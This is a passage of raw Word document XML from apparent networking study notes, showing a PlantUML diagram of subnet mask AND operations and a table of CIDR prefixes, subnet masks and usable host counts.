          <w:p w14:paraId="66DA38FE" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "100\n01100100" as ip4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CC94D46" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31A670F0" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5947805A" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "Subnet Mask: 255.255.255.0" {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2713DC61" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "255\n11111111" as mask1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FFA4D5B" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "255\n11111111" as mask2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="007666EB" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "255\n11111111" as mask3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5956E417" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "0\n00000000" as mask4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75793253" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="458C9C01" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E49A3F6" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "Result (AND Operation)" {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A23E6CA" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Network Portion\n192.168.1.0\n11000000.10101000.00000001.00000000" as net</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E59A5BB" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Host Portion\n0.0.0.100\n00000000.00000000.00000000.01100100" as host</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1037C251" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46264690" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="456DD170" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>ip1 --&gt; mask1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21088856" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">ip2 --&gt; mask2  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F630C21" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>ip3 --&gt; mask3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75D5335D" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>ip4 --&gt; mask4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F206DC6" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A20097D" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>mask1 --&gt; net : 1 bits = Network</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A18E1F7" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>mask2 --&gt; net</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57A1AD9A" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>mask3 --&gt; net</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="708DC3DC" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>mask4 --&gt; host : 0 bits = Host</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="099FC3BD" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5124E407" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of net : Network ID: 192.168.1.0\nAll devices on same subnet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F4CCD7E" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of host : Host ID: .100\nUnique device identifier</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1074124C" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4FEEB7F0" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note bottom : Subnet Mask determines:\n• Which part identifies the network\n• Which part identifies the host\n• How routing decisions are made</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14135339" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E3FD327" w14:textId="446C6DCD" w:rsidR="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28190C68" w14:textId="5B2FC11A" w:rsidR="00855D4D" w:rsidRPr="00855D4D" w:rsidRDefault="00855D4D" w:rsidP="00855D4D">
      <w:r>
        <w:t xml:space="preserve">If you combine subnet mask and CIDR, you can calculate number of </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5C98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>usable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5C98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hosts per subnet</w:t>
      </w:r>
      <w:r w:rsidR="00D171B6">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00C96100">
        <w:t xml:space="preserve">how many devices you can </w:t>
      </w:r>
      <w:r w:rsidR="00D171B6" w:rsidRPr="00D171B6">
        <w:t>IPs to in this subnet</w:t>
      </w:r>
      <w:r w:rsidR="00D171B6">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D171B6" w:rsidRPr="00D171B6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E87762E" w14:textId="77777777" w:rsidR="00855D4D" w:rsidRDefault="00855D4D" w:rsidP="00855D4D">
      <w:r w:rsidRPr="00FA148D">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="850"/>
        <w:gridCol w:w="1977"/>
        <w:gridCol w:w="4245"/>
        <w:gridCol w:w="4549"/>
        <w:gridCol w:w="5875"/>
      </w:tblGrid>
      <w:tr w:rsidR="00151156" w:rsidRPr="0074642F" w14:paraId="2FADD6BD" w14:textId="770F9BEE" w:rsidTr="007B0714">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="243" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36A41F24" w14:textId="77777777" w:rsidR="00151156" w:rsidRPr="00855D4D" w:rsidRDefault="00151156" w:rsidP="00855D4D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00855D4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CIDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="565" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="514B74A7" w14:textId="0A7CD9E6" w:rsidR="00151156" w:rsidRPr="00855D4D" w:rsidRDefault="00151156" w:rsidP="00855D4D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00855D4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Subnet </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidRPr="00855D4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1213" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="79019789" w14:textId="4A800494" w:rsidR="00151156" w:rsidRPr="00855D4D" w:rsidRDefault="00151156" w:rsidP="00855D4D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Number of addresses per subnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56C71CEF" w14:textId="5AC8B8CF" w:rsidR="00151156" w:rsidRPr="00855D4D" w:rsidRDefault="00151156" w:rsidP="00855D4D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Number of usable h</w:t>
            </w:r>
            <w:r w:rsidRPr="00855D4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">osts per </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00855D4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ubnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1679" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2CDDE98E" w14:textId="09E4168C" w:rsidR="00151156" w:rsidRPr="00855D4D" w:rsidRDefault="00151156" w:rsidP="00855D4D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00855D4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00151156" w:rsidRPr="0074642F" w14:paraId="1F7FCCDC" w14:textId="5855BC3C" w:rsidTr="007B0714">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="243" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B13E94D" w14:textId="77777777" w:rsidR="00151156" w:rsidRPr="0074642F" w:rsidRDefault="00151156" w:rsidP="00FA148D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="0074642F">
              <w:t>/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="565" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05EA043F" w14:textId="77777777" w:rsidR="00151156" w:rsidRPr="0074642F" w:rsidRDefault="00151156" w:rsidP="00FA148D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="0074642F">
              <w:t>255.255.255.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1213" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="448FC562" w14:textId="5222392E" w:rsidR="00151156" w:rsidRPr="0074642F" w:rsidRDefault="00151156" w:rsidP="00FA148D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DB18D1F" w14:textId="4D1F4B12" w:rsidR="00151156" w:rsidRPr="0074642F" w:rsidRDefault="00151156" w:rsidP="00FA148D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="0074642F">
              <w:t>254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1679" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0CB9080E" w14:textId="1632149D" w:rsidR="00151156" w:rsidRPr="00855D4D" w:rsidRDefault="00151156" w:rsidP="00855D4D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00855D4D">
              <w:t>Host portion has 8 bit, so:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3176AEB8" w14:textId="1A4D8A21" w:rsidR="00151156" w:rsidRPr="00855D4D" w:rsidRDefault="00151156" w:rsidP="00855D4D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00855D4D">
              <w:t>- You can have 2⁸ = 256 total combinations.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31199413" w14:textId="0E5568D6" w:rsidR="00151156" w:rsidRPr="00855D4D" w:rsidRDefault="00151156" w:rsidP="00855D4D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00855D4D">
              <w:t>- But 2 addresses are reserved:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D525E77" w14:textId="52867B0F" w:rsidR="00151156" w:rsidRPr="00855D4D" w:rsidRDefault="00151156" w:rsidP="00855D4D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00855D4D">
              <w:t xml:space="preserve">   + Network address (all host bits = 0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BFED299" w14:textId="44D6F657" w:rsidR="00151156" w:rsidRPr="00855D4D" w:rsidRDefault="00151156" w:rsidP="00855D4D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00855D4D">
              <w:t xml:space="preserve">   + Broadcast address (all host bits = 1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C2326DB" w14:textId="64849600" w:rsidR="00151156" w:rsidRPr="0074642F" w:rsidRDefault="00151156" w:rsidP="00FA148D">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00855D4D">
              <w:t>So the number of usable host addresses is: 254</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00151156" w:rsidRPr="0074642F" w14:paraId="66F51B22" w14:textId="1B969054" w:rsidTr="007B0714">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="243" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04E2CB4C" w14:textId="77777777" w:rsidR="00151156" w:rsidRPr="0074642F" w:rsidRDefault="00151156" w:rsidP="00151156">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="0074642F">
              <w:t>/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="565" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9DDF01" w14:textId="77777777" w:rsidR="00151156" w:rsidRPr="0074642F" w:rsidRDefault="00151156" w:rsidP="00151156">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="0074642F">
              <w:t>255.255.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1213" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="003FC1C9" w14:textId="3EB852E8" w:rsidR="00151156" w:rsidRPr="0074642F" w:rsidRDefault="00151156" w:rsidP="00151156">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="0074642F">
              <w:t>65,53</w:t>
            </w:r>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4280EC46" w14:textId="5A942441" w:rsidR="00151156" w:rsidRPr="0074642F" w:rsidRDefault="00151156" w:rsidP="00151156">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="0074642F">
              <w:t>65,534</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1679" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7A2BA839" w14:textId="77777777" w:rsidR="00151156" w:rsidRPr="0074642F" w:rsidRDefault="00151156" w:rsidP="00151156">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00151156" w:rsidRPr="0074642F" w14:paraId="044222C7" w14:textId="77E19E5F" w:rsidTr="007B0714">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="243" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
